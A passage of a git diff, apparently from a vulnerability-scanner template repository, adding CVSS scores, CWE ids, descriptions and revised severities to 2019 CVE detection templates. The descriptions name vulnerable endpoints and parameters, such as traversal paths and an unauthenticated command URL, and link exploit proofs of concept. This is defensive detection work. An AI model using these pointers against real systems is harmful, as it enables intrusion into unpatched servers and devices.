Images plugin before 0.6.67 for WordPress allows remote attackers to retrieve arbitrary files via the $REQUEST['adaptive-images-settings']['source_file'] parameter in adaptive-images-script.php. reference: https://github.com/security-kma/EXPLOITING-CVE-2019-14205 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2019-14205 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2019/CVE-2019-14223.yaml b/cves/2019/CVE-2019-14223.yaml index 9e75997beb..8caabe4459 100644 --- a/cves/2019/CVE-2019-14223.yaml +++ b/cves/2019/CVE-2019-14223.yaml @@ -3,12 +3,17 @@ id: CVE-2019-14223 info: name: Alfresco Share Open Redirect author: pdteam - severity: low + severity: medium description: An issue was discovered in Alfresco Community Edition versions below 5.2.6, 6.0.N and 6.1.N. The Alfresco Share application is vulnerable to an Open Redirect attack via a crafted POST request. By manipulating the POST parameters, an attacker can redirect a victim to a malicious website over any protocol the attacker desires (e.g.,http, https, ftp, smb, etc.). reference: - https://community.alfresco.com/content?filterID=all~objecttype~thread%5Bquestions%5D - https://github.com/DrunkenShells/Disclosures/tree/master/CVE-2019-14223-Open%20Redirect%20in%20Alfresco%20Share-Alfresco%20Community tags: cve,cve2019,redirect + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-14223 + cwe-id: CWE-601 requests: - method: POST diff --git a/cves/2019/CVE-2019-14312.yaml b/cves/2019/CVE-2019-14312.yaml index 33a5873d2d..ba83455a64 100644 --- a/cves/2019/CVE-2019-14312.yaml +++ b/cves/2019/CVE-2019-14312.yaml @@ -3,12 +3,17 @@ id: CVE-2019-14312 info: name: Aptana Jaxer 1.0.3.4547 - Local File inclusion author: daffainfo - severity: high + severity: medium description: Aptana Jaxer 1.0.3.4547 is vulnerable to a local file inclusion vulnerability in the wikilite source code viewer. This vulnerability allows a remote attacker to read internal files on the server via a tools/sourceViewer/index.html?filename=../ URI. reference: - https://www.exploit-db.com/exploits/47214 - https://www.cvedetails.com/cve/CVE-2019-14312 tags: cve,cve2019,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.50 + cve-id: CVE-2019-14312 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2019/CVE-2019-14322.yaml b/cves/2019/CVE-2019-14322.yaml index 2aa82033aa..4c63be4e87 100644 --- a/cves/2019/CVE-2019-14322.yaml +++ b/cves/2019/CVE-2019-14322.yaml @@ -5,6 +5,15 @@ info: author: madrobot severity: high tags: cve,cve2019,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2019-14322 + cwe-id: CWE-22 + description: "In Pallets Werkzeug before 0.15.5, SharedDataMiddleware mishandles drive names (such as C:) in Windows pathnames." + reference: + - https://palletsprojects.com/blog/werkzeug-0-15-5-released/ + - http://packetstormsecurity.com/files/163398/Pallets-Werkzeug-0.15.4-Path-Traversal.html requests: - method: GET diff --git a/cves/2019/CVE-2019-14470.yaml b/cves/2019/CVE-2019-14470.yaml index 05400bc1a4..d956d7190a 100644 --- a/cves/2019/CVE-2019-14470.yaml +++ b/cves/2019/CVE-2019-14470.yaml @@ -8,6 +8,12 @@ info: - https://wpscan.com/vulnerability/9815 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14470 tags: cve,cve2019,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-14470 + cwe-id: CWE-79 + description: "cosenary Instagram-PHP-API (aka Instagram PHP API V2), as used in the UserPro plugin through 4.9.32 for WordPress, has XSS via the example/success.php error_description parameter." requests: - method: GET diff --git a/cves/2019/CVE-2019-14696.yaml b/cves/2019/CVE-2019-14696.yaml index 85799b6418..7188ec08ff 100644 --- a/cves/2019/CVE-2019-14696.yaml +++ b/cves/2019/CVE-2019-14696.yaml @@ -6,6 +6,12 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2019-14696 tags: cve,cve2019,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-14696 + cwe-id: CWE-79 + description: "Open-School 3.0, and Community Edition 2.3, allows XSS via the osv/index.php?r=students/guardians/create id parameter." requests: - method: GET diff --git a/cves/2019/CVE-2019-14974.yaml b/cves/2019/CVE-2019-14974.yaml index 6bc08641a7..66654e66ed 100644 --- a/cves/2019/CVE-2019-14974.yaml +++ b/cves/2019/CVE-2019-14974.yaml @@ -3,8 +3,16 @@ id: CVE-2019-14974 info: name: SugarCRM Enterprise 9.0.0 - Cross-Site Scripting author: madrobot - severity: low + severity: medium tags: cve,cve2019,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-14974 + cwe-id: CWE-79 + description: "SugarCRM Enterprise 9.0.0 allows mobile/error-not-supported-platform.html?desktop_url= XSS." + reference: + - https://www.exploit-db.com/exploits/47247 requests: - method: GET diff --git a/cves/2019/CVE-2019-15043.yaml b/cves/2019/CVE-2019-15043.yaml index dddcb93e9e..94b48eecc8 100644 --- a/cves/2019/CVE-2019-15043.yaml +++ b/cves/2019/CVE-2019-15043.yaml @@ -2,13 +2,18 @@ id: CVE-2019-15043 info: author: bing0o name: Grafana unauthenticated API - severity: medium + severity: high description: In Grafana 2.x through 6.x before 6.3.4, parts of the HTTP API allow unauthenticated use. This makes it possible to run a denial of service attack against the server running Grafana. reference: - https://grafana.com/blog/2019/08/29/grafana-5.4.5-and-6.3.4-released-with-important-security-fix/ - https://community.grafana.com/t/grafana-5-4-5-and-6-3-4-security-update/20569 Vendor Advisory - https://community.grafana.com/t/release-notes-v6-3-x/19202 tags: cve,cve2019,grafana + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-score: 7.50 + cve-id: CVE-2019-15043 + cwe-id: CWE-306 requests: - raw: diff --git a/cves/2019/CVE-2019-15107.yaml b/cves/2019/CVE-2019-15107.yaml index 9d736b993d..7f6616f3c8 100644 --- a/cves/2019/CVE-2019-15107.yaml +++ b/cves/2019/CVE-2019-15107.yaml @@ -3,10 +3,15 @@ id: CVE-2019-15107 info: name: Webmin <= 1.920 Unauthenticated Remote Command Execution author: bp0lr - severity: high + severity: critical description: An issue was discovered in Webmin <=1.920. The 'old' parameter in password_change.cgi contains a command injection vulnerability. reference: https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html tags: cve,cve2019,webmin,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-15107 + cwe-id: CWE-78 requests: - raw: # diff --git a/cves/2019/CVE-2019-15501.yaml b/cves/2019/CVE-2019-15501.yaml index 3481874161..f1cdb338d5 100644 --- a/cves/2019/CVE-2019-15501.yaml +++ b/cves/2019/CVE-2019-15501.yaml @@ -9,6 +9,12 @@ info: - http://www.lsoft.com/manuals/16.5/LISTSERV16.5-2018a_WhatsNew.pdf - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15501 tags: cve,cve2019,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-15501 + cwe-id: CWE-79 + description: "Reflected cross site scripting (XSS) in L-Soft LISTSERV before 16.5-2018a exists via the /scripts/wa.exe OK parameter." requests: - method: GET diff --git a/cves/2019/CVE-2019-15713.yaml b/cves/2019/CVE-2019-15713.yaml index e2cf961b99..052732aa1e 100644 --- a/cves/2019/CVE-2019-15713.yaml +++ b/cves/2019/CVE-2019-15713.yaml @@ -9,6 +9,11 @@ info: - https://wpscan.com/vulnerability/9267 - https://nvd.nist.gov/vuln/detail/CVE-2019-15713 tags: cve,cve2019,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-15713 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2019/CVE-2019-15858.yaml b/cves/2019/CVE-2019-15858.yaml index 104ee2be4e..0516be3ea1 100644 --- a/cves/2019/CVE-2019-15858.yaml +++ b/cves/2019/CVE-2019-15858.yaml @@ -13,6 +13,11 @@ info: reference: https://github.com/GeneralEG/CVE-2019-15858 tags: cve,cve2019,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2019-15858 + cwe-id: CWE-306 requests: - method: GET diff --git a/cves/2019/CVE-2019-15859.yaml b/cves/2019/CVE-2019-15859.yaml index cfdbc56cc2..3d33b1df7c 100644 --- a/cves/2019/CVE-2019-15859.yaml +++ b/cves/2019/CVE-2019-15859.yaml @@ -7,6 +7,11 @@ info: reference: https://seclists.org/fulldisclosure/2019/Oct/10 severity: critical tags: cve,cve2019,disclosure,socomec,diris,iot + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-15859 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2019/CVE-2019-15889.yaml b/cves/2019/CVE-2019-15889.yaml index 6ccc20b699..66a57ec7c5 100644 --- a/cves/2019/CVE-2019-15889.yaml +++ b/cves/2019/CVE-2019-15889.yaml @@ -9,6 +9,11 @@ info: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15889 - https://www.cybersecurity-help.cz/vdb/SB2019041819 tags: cve,cve2019,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-15889 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2019/CVE-2019-16097.yaml b/cves/2019/CVE-2019-16097.yaml index bbcb4dd03f..a22723a7a2 100644 --- a/cves/2019/CVE-2019-16097.yaml +++ b/cves/2019/CVE-2019-16097.yaml @@ -2,13 +2,18 @@ id: CVE-2019-16097 info: name: Harbor Enables Privilege Escalation From Zero to admin author: pikpikcu - severity: critical + severity: medium description: | core/api/user.go in Harbor 1.7.0 through 1.8.2 allows non-admin users to create admin accounts via the POST /api/users API, when Harbor is setup with DB as authentication backend and allow user to do self-registration. Fixed version: v1.7.6 v1.8.3. v.1.9.0. Workaround without applying the fix: configure Harbor to use non-DB authentication backend such as LDAP. reference: - https://unit42.paloaltonetworks.com/critical-vulnerability-in-harbor-enables-privilege-escalation-from-zero-to-admin-cve-2019-16097/ - https://github.com/goharbor/harbor/issues/8951 tags: cve,cve2019,intrusive,harbor + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N + cvss-score: 6.50 + cve-id: CVE-2019-16097 + cwe-id: CWE-862 requests: - method: POST diff --git a/cves/2019/CVE-2019-16278.yaml b/cves/2019/CVE-2019-16278.yaml index 21efd21490..ca568b2722 100644 --- a/cves/2019/CVE-2019-16278.yaml +++ b/cves/2019/CVE-2019-16278.yaml @@ -6,6 +6,12 @@ info: severity: critical reference: https://www.exploit-db.com/raw/47837 tags: cve,cve2019,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-16278 + cwe-id: CWE-22 + description: "Directory Traversal in the function http_verify in nostromo nhttpd through 1.9.6 allows an attacker to achieve remote code execution via a crafted HTTP request." requests: - raw: diff --git a/cves/2019/CVE-2019-16313.yaml b/cves/2019/CVE-2019-16313.yaml index e1bd078ded..8a154f7dff 100644 --- a/cves/2019/CVE-2019-16313.yaml +++ b/cves/2019/CVE-2019-16313.yaml @@ -9,6 +9,11 @@ info: - https://github.com/Mr-xn/Penetration_Testing_POC/blob/master/CVE-2019-16313%20%E8%9C%82%E7%BD%91%E4%BA%92%E8%81%94%E4%BC%81%E4%B8%9A%E7%BA%A7%E8%B7%AF%E7%94%B1%E5%99%A8v4.31%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md - https://nvd.nist.gov/vuln/detail/CVE-2019-16313 tags: cve,cve2019,exposure,router,iot + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2019-16313 + cwe-id: CWE-798 requests: - method: GET diff --git a/cves/2019/CVE-2019-16332.yaml b/cves/2019/CVE-2019-16332.yaml index 4f4f37861c..988cb5d0d9 100644 --- a/cves/2019/CVE-2019-16332.yaml +++ b/cves/2019/CVE-2019-16332.yaml @@ -9,6 +9,11 @@ info: - https://plugins.trac.wordpress.org/changeset/2152730 - https://wordpress.org/plugins/api-bearer-auth/#developers tags: cve,cve2019,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-16332 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2019/CVE-2019-16525.yaml b/cves/2019/CVE-2019-16525.yaml index c2ccc90357..c0b2649797 100644 --- a/cves/2019/CVE-2019-16525.yaml +++ b/cves/2019/CVE-2019-16525.yaml @@ -7,6 +7,11 @@ info: description: An XSS issue was discovered in the checklist plugin before 1.1.9 for WordPress. The fill parameter is not correctly filtered in the checklist-icon.php file, and it is possible to inject JavaScript code. reference: https://nvd.nist.gov/vuln/detail/CVE-2019-16525 tags: cve,cve2019,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-16525 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2019/CVE-2019-1653.yaml b/cves/2019/CVE-2019-1653.yaml index 34e5db456d..3428aaef8e 100644 --- a/cves/2019/CVE-2019-1653.yaml +++ b/cves/2019/CVE-2019-1653.yaml @@ -10,6 +10,11 @@ info: - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info - https://www.exploit-db.com/exploits/46262/ - https://www.exploit-db.com/exploits/46655/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2019-1653 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2019/CVE-2019-16662.yaml b/cves/2019/CVE-2019-16662.yaml index 592bff2265..7ab910ea7e 100644 --- a/cves/2019/CVE-2019-16662.yaml +++ b/cves/2019/CVE-2019-16662.yaml @@ -6,6 +6,12 @@ info: severity: critical reference: https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/ tags: cve,cve2019,rce,intrusive + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-16662 + cwe-id: CWE-78 + description: "An issue was discovered in rConfig 3.9.2. An attacker can directly execute system commands by sending a GET request to ajaxServerSettingsChk.php because the rootUname parameter is passed to the exec function without filtering, which can lead to command execution." requests: - method: GET diff --git a/cves/2019/CVE-2019-16759.yaml b/cves/2019/CVE-2019-16759.yaml index 7c3e049ff8..7917672a21 100644 --- a/cves/2019/CVE-2019-16759.yaml +++ b/cves/2019/CVE-2019-16759.yaml @@ -3,9 +3,15 @@ id: CVE-2019-16759 info: name: 0day RCE in vBulletin v5.0.0-v5.5.4 fix bypass author: madrobot - severity: high + severity: critical reference: https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/ tags: cve,cve2019,vbulletin,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-16759 + cwe-id: CWE-94 + description: "vBulletin 5.x through 5.5.4 allows remote command execution via the widgetConfig[code] parameter in an ajax/render/widget_php routestring request." requests: - raw: diff --git a/cves/2019/CVE-2019-16920.yaml b/cves/2019/CVE-2019-16920.yaml index 2ac46ac67b..c45dc73829 100644 --- a/cves/2019/CVE-2019-16920.yaml +++ b/cves/2019/CVE-2019-16920.yaml @@ -7,6 +7,11 @@ info: description: Unauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565. The issue occurs when the attacker sends an arbitrary input to a "PingTest" device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these are also affected; DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825. reference: https://github.com/pwnhacker0x18/CVE-2019-16920-MassPwn3r tags: cve,cve2019,dlink,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-16920 + cwe-id: CWE-78 requests: - raw: diff --git a/cves/2019/CVE-2019-17270.yaml b/cves/2019/CVE-2019-17270.yaml index 3b9928363a..35d7049dea 100644 --- a/cves/2019/CVE-2019-17270.yaml +++ b/cves/2019/CVE-2019-17270.yaml @@ -3,13 +3,18 @@ id: CVE-2019-17270 info: name: Yachtcontrol Webapplication 1.0 - Unauthenticated Rce author: pikpikcu - severity: high + severity: critical reference: - https://www.exploit-db.com/exploits/47760 - https://nvd.nist.gov/vuln/detail/CVE-2019-17270 description: | A vulnerability in Yachtcontrol makes it possible to perform direct Operating System commands as an unauthenticated user via the "/pages/systemcall.php?command={COMMAND}" page and parameter, where {COMMAND} will be executed and returning the results to the client. Affects Yachtcontrol webservers disclosed via Dutch GPRS/4G mobile IP-ranges. IP addresses vary due to DHCP client leasing of telco's. tags: rce,yachtcontrol,cve,cve2019 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-17270 + cwe-id: CWE-78 requests: - method: GET diff --git a/cves/2019/CVE-2019-17382.yaml b/cves/2019/CVE-2019-17382.yaml index d25a72cee2..163e4ead10 100644 --- a/cves/2019/CVE-2019-17382.yaml +++ b/cves/2019/CVE-2019-17382.yaml @@ -7,6 +7,11 @@ info: description: An issue was discovered in zabbix.php?action=dashboard.view&dashboardid=1 in Zabbix through 4.4. An attacker can bypass the login page and access the dashboard page, and then create a Dashboard, Report, Screen, or Map without any Username/Password (i.e., anonymously). All created elements (Dashboard/Report/Screen/Map) are accessible by other users and by an admin. reference: https://www.exploit-db.com/exploits/47467 tags: cve,cve2019,zabbix,fuzz + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 9.10 + cve-id: CVE-2019-17382 + cwe-id: CWE-639 requests: - raw: diff --git a/cves/2019/CVE-2019-17503.yaml b/cves/2019/CVE-2019-17503.yaml index beca789136..a3b8e66c08 100644 --- a/cves/2019/CVE-2019-17503.yaml +++ b/cves/2019/CVE-2019-17503.yaml @@ -9,6 +9,11 @@ info: - https://www.exploit-db.com/exploits/47498 - https://nvd.nist.gov/vuln/detail/CVE-2019-17503 tags: cve,cve2019,exposure + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2019-17503 + cwe-id: CWE-425 requests: - method: GET diff --git a/cves/2019/CVE-2019-17506.yaml b/cves/2019/CVE-2019-17506.yaml index 3a6a05e8f2..0dbb3edcee 100644 --- a/cves/2019/CVE-2019-17506.yaml +++ b/cves/2019/CVE-2019-17506.yaml @@ -7,6 +7,11 @@ info: description: There are some web interfaces without authentication requirements on D-Link DIR-868L B1-2.03 and DIR-817LW A1-1.04 routers. An attacker can get the router's username and password (and other information) via a DEVICE.ACCOUNT value for SERVICES in conjunction with AUTHORIZED_GROUP=1%0a to getcfg.php. This could be used to control the router remotely. reference: https://github.com/dahua966/Routers-vuls/blob/master/DIR-868/name%26passwd.py tags: cve,cve2019,dlink + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-17506 + cwe-id: CWE-306 requests: - method: POST diff --git a/cves/2019/CVE-2019-17538.yaml b/cves/2019/CVE-2019-17538.yaml index 4051eaaa7e..a1a7023154 100644 --- a/cves/2019/CVE-2019-17538.yaml +++ b/cves/2019/CVE-2019-17538.yaml @@ -6,6 +6,12 @@ info: reference: https://github.com/shi-yang/jnoj/issues/53 tags: cve,cve2019,jnoj,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2019-17538 + cwe-id: CWE-22 + description: "Jiangnan Online Judge (aka jnoj) 0.8.0 has Directory Traversal for file reading via the web/polygon/problem/viewfile?id=1&name=../ substring." requests: - raw: - | diff --git a/cves/2019/CVE-2019-17558.yaml b/cves/2019/CVE-2019-17558.yaml index b7c1855604..dc6c7b9786 100644 --- a/cves/2019/CVE-2019-17558.yaml +++ b/cves/2019/CVE-2019-17558.yaml @@ -2,9 +2,15 @@ id: CVE-2019-17558 info: name: Apache Solr 8.3.0 - Remote Code Execution via Velocity Template author: pikpikcu,madrobot - severity: critical + severity: high reference: https://nvd.nist.gov/vuln/detail/CVE-2019-17558 tags: cve,cve2019,apache,rce,solr,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.50 + cve-id: CVE-2019-17558 + cwe-id: CWE-74 + description: "Apache Solr 5.0.0 to Apache Solr 8.3.1 are vulnerable to a Remote Code Execution through the VelocityResponseWriter. A Velocity template can be provided through Velocity templates in a configset `velocity/` directory or as a parameter. A user defined configset could contain renderable, potentially malicious, templates. Parameter provided templates are disabled by default, but can be enabled by setting `params.resource.loader.enabled` by defining a response writer with that setting set to `true`. Defining a response writer requires configuration API access. Solr 8.4 removed the params resource loader entirely, and only enables the configset-provided template rendering when the configset is `trusted` (has been uploaded by an authenticated user)." requests: - raw: diff --git a/cves/2019/CVE-2019-18393.yaml b/cves/2019/CVE-2019-18393.yaml index 6f9a81ac5d..ca54457a31 100644 --- a/cves/2019/CVE-2019-18393.yaml +++ b/cves/2019/CVE-2019-18393.yaml @@ -2,10 +2,15 @@ id: CVE-2019-18393 info: name: Openfire LFI author: pikpikcu - severity: high + severity: medium description: PluginServlet.java in Ignite Realtime Openfire through 4.4.2 does not ensure that retrieved files are located under the Openfire home directory, aka a directory traversal vulnerability. reference: https://swarm.ptsecurity.com/openfire-admin-console/ tags: cve,cve2019,openfire,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2019-18393 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2019/CVE-2019-18394.yaml b/cves/2019/CVE-2019-18394.yaml index 389cc72ec4..3c50ca751a 100644 --- a/cves/2019/CVE-2019-18394.yaml +++ b/cves/2019/CVE-2019-18394.yaml @@ -9,6 +9,11 @@ info: - https://swarm.ptsecurity.com/openfire-admin-console/ - https://github.com/igniterealtime/Openfire/pull/1497 tags: cve,cve2019,ssrf,openfire,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-18394 + cwe-id: CWE-918 requests: - method: GET diff --git a/cves/2019/CVE-2019-18818.yaml b/cves/2019/CVE-2019-18818.yaml index bd28bef61f..01d00b9999 100644 --- a/cves/2019/CVE-2019-18818.yaml +++ b/cves/2019/CVE-2019-18818.yaml @@ -10,6 +10,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2019-18818 severity: critical tags: cve,cve2019,strapi,auth-bypass,intrusive + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-18818 + cwe-id: CWE-640 requests: - raw: diff --git a/cves/2019/CVE-2019-19134.yaml b/cves/2019/CVE-2019-19134.yaml index 89c923f6b0..5a3e696f04 100644 --- a/cves/2019/CVE-2019-19134.yaml +++ b/cves/2019/CVE-2019-19134.yaml @@ -7,6 +7,11 @@ info: description: The Hero Maps Premium plugin 2.2.1 and prior for WordPress is prone to unauthenticated XSS via the views/dashboard/index.php p parameter because it fails to sufficiently sanitize user-supplied input - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985 reference: https://wpscan.com/vulnerability/d179f7fe-e3e7-44b3-9bf8-aab2e90dbe01 tags: cve,cve2019,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-19134 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2019/CVE-2019-19368.yaml b/cves/2019/CVE-2019-19368.yaml index a0715365dc..0105b0b817 100644 --- a/cves/2019/CVE-2019-19368.yaml +++ b/cves/2019/CVE-2019-19368.yaml @@ -7,6 +7,11 @@ info: description: A Reflected Cross Site Scripting was discovered in the Login page of Rumpus FTP Web File Manager 8.2.9.1. An attacker can exploit it by sending a crafted link to end users and can execute arbitrary Javascripts reference: https://github.com/harshit-shukla/CVE-2019-19368/ tags: cve,cve2019,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-19368 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2019/CVE-2019-19781.yaml b/cves/2019/CVE-2019-19781.yaml index 9557399b76..318fc4fb2c 100644 --- a/cves/2019/CVE-2019-19781.yaml +++ b/cves/2019/CVE-2019-19781.yaml @@ -3,10 +3,15 @@ id: CVE-2019-19781 info: name: Citrix ADC Directory Traversal author: organiccrap - severity: high + severity: critical description: An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal. reference: https://support.citrix.com/article/CTX267027 tags: cve,cve2019,citrix,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-19781 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2019/CVE-2019-19908.yaml b/cves/2019/CVE-2019-19908.yaml index 3be30f419e..8f9a04ea11 100644 --- a/cves/2019/CVE-2019-19908.yaml +++ b/cves/2019/CVE-2019-19908.yaml @@ -7,6 +7,11 @@ info: description: phpMyChat-Plus 1.98 is vulnerable to reflected XSS via JavaScript injection into the password reset URL. In the URL, the pmc_username parameter to pass_reset.php is vulnerable. reference: https://cinzinga.github.io/CVE-2019-19908/ tags: cve,cve2019,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-19908 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2019/CVE-2019-19985.yaml b/cves/2019/CVE-2019-19985.yaml index 6d1138f5ce..da9611d488 100644 --- a/cves/2019/CVE-2019-19985.yaml +++ b/cves/2019/CVE-2019-19985.yaml @@ -7,6 +7,11 @@ info: description: The WordPress plugin, Email Subscribers & Newsletters, before 4.2.3 had a flaw that allowed unauthenticated file download with user information disclosure. reference: https://www.exploit-db.com/exploits/48698 tags: cve,cve2019,wordpress,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2019-19985 + cwe-id: CWE-862 requests: - method: GET diff --git a/cves/2019/CVE-2019-20085.yaml b/cves/2019/CVE-2019-20085.yaml index 58a3857874..605d0be619 100644 --- a/cves/2019/CVE-2019-20085.yaml +++ b/cves/2019/CVE-2019-20085.yaml @@ -9,6 +9,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2019-20085 - https://www.exploit-db.com/exploits/48311 tags: cve,cve2019,iot,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2019-20085 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2019/CVE-2019-20141.yaml b/cves/2019/CVE-2019-20141.yaml index e94d8eb197..43d20edb98 100644 --- a/cves/2019/CVE-2019-20141.yaml +++ b/cves/2019/CVE-2019-20141.yaml @@ -7,6 +7,11 @@ info: description: An XSS issue was discovered in the Laborator Neon theme 2.0 for WordPress via the data/autosuggest-remote.php q parameter. reference: https://knassar7o2.blogspot.com/2019/12/neon-dashboard-cve-2019-20141.html tags: cve,cve2019,xss + classification: + cvss-metrics: 